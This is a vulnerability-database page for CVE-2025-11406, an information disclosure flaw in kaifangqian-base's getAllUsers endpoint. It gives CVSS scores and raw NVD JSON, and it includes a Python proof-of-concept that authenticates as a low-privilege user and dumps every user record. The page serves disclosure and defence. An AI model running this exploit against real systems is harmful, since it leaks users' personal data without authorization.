Security Vulnerability Report
中文
CVE-2025-11406 CVSS 4.3 MEDIUM

CVE-2025-11406

Published: 2025-10-07 20:15:33
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A security flaw has been discovered in kaifangqian kaifangqian-base up to 7b3faecda13848b3ced6c17c7423b76c5b47b8ab. This issue affects the function getAllUsers of the file kaifangqian-parent/kaifangqian-system/src/main/java/com/kaifangqian/modules/system/controller/SysUserController.java. The manipulation results in information disclosure. The attack can be launched remotely. The exploit has been released to the public and may be exploited. This product does not use versioning. This is why information about affected and unaffected releases are unavailable.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

kaifangqian kaifangqian-base (commit 7b3faecda13848b3ced6c17c7423b76c5b47b8ab及之前版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ CVE-2025-11406 PoC - kaifangqian-base getAllUsers Information Disclosure This PoC demonstrates how a low-privileged authenticated user can retrieve all user information from the kaifangqian system. """ import requests import json import sys # Configuration TARGET_URL = "http://target-host:port" # Replace with actual target LOGIN_URL = f"{TARGET_URL}/sys/login" GET_ALL_USERS_URL = f"{TARGET_URL}/sys/user/getAllUsers" # Low-privilege user credentials (obtained via registration or other means) USERNAME = "low_priv_user" PASSWORD = "password123" def login(session, username, password): """Authenticate and obtain session/token.""" login_data = { "username": username, "password": password } try: resp = session.post(LOGIN_URL, json=login_data, timeout=10) if resp.status_code == 200: result = resp.json() if result.get("code") == 200: token = result.get("data", {}).get("token") or result.get("data", {}).get("access_token") print(f"[+] Login successful, token obtained") return token except Exception as e: print(f"[-] Login failed: {e}") return None def exploit_get_all_users(session, token): """Exploit the getAllUsers endpoint to retrieve all user information.""" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } try: resp = session.get(GET_ALL_USERS_URL, headers=headers, timeout=10) if resp.status_code == 200: data = resp.json() if data.get("code") == 200: users = data.get("data", []) print(f"[+] Exploit successful! Retrieved {len(users)} user records") print("[*] Sample leaked user data:") for user in users[:5]: print(json.dumps(user, ensure_ascii=False, indent=2)) return users else: print(f"[-] API returned error: {data.get('message')}") else: print(f"[-] Request failed with status: {resp.status_code}") except Exception as e: print(f"[-] Exploit failed: {e}") return None def main(): session = requests.Session() print("[*] CVE-2025-11406 PoC - kaifangqian Information Disclosure") print(f"[*] Target: {TARGET_URL}") # Step 1: Login with low-privilege account token = login(session, USERNAME, PASSWORD) if not token: print("[-] Cannot proceed without valid token") sys.exit(1) # Step 2: Exploit getAllUsers to leak all user information users = exploit_get_all_users(session, token) if users: print(f"\n[!] Total users leaked: {len(users)}") print("[!] This information can be used for further attacks") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11406", "sourceIdentifier": "[email protected]", "published": "2025-10-07T20:15:33.190", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in kaifangqian kaifangqian-base up to 7b3faecda13848b3ced6c17c7423b76c5b47b8ab. This issue affects the function getAllUsers of the file kaifangqian-parent/kaifangqian-system/src/main/java/com/kaifangqian/modules/system/controller/SysUserController.java. The manipulation results in information disclosure. The attack can be launched remotely. The exploit has been released to the public and may be exploited. This product does not use versioning. This is why information about affected and unaffected releases are unavailable."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://flowus.cn/share/71182903-2a36-488f-ac3f-4f94c725f545?code=6HT9ZE", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.327343", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.327343", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.665162", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.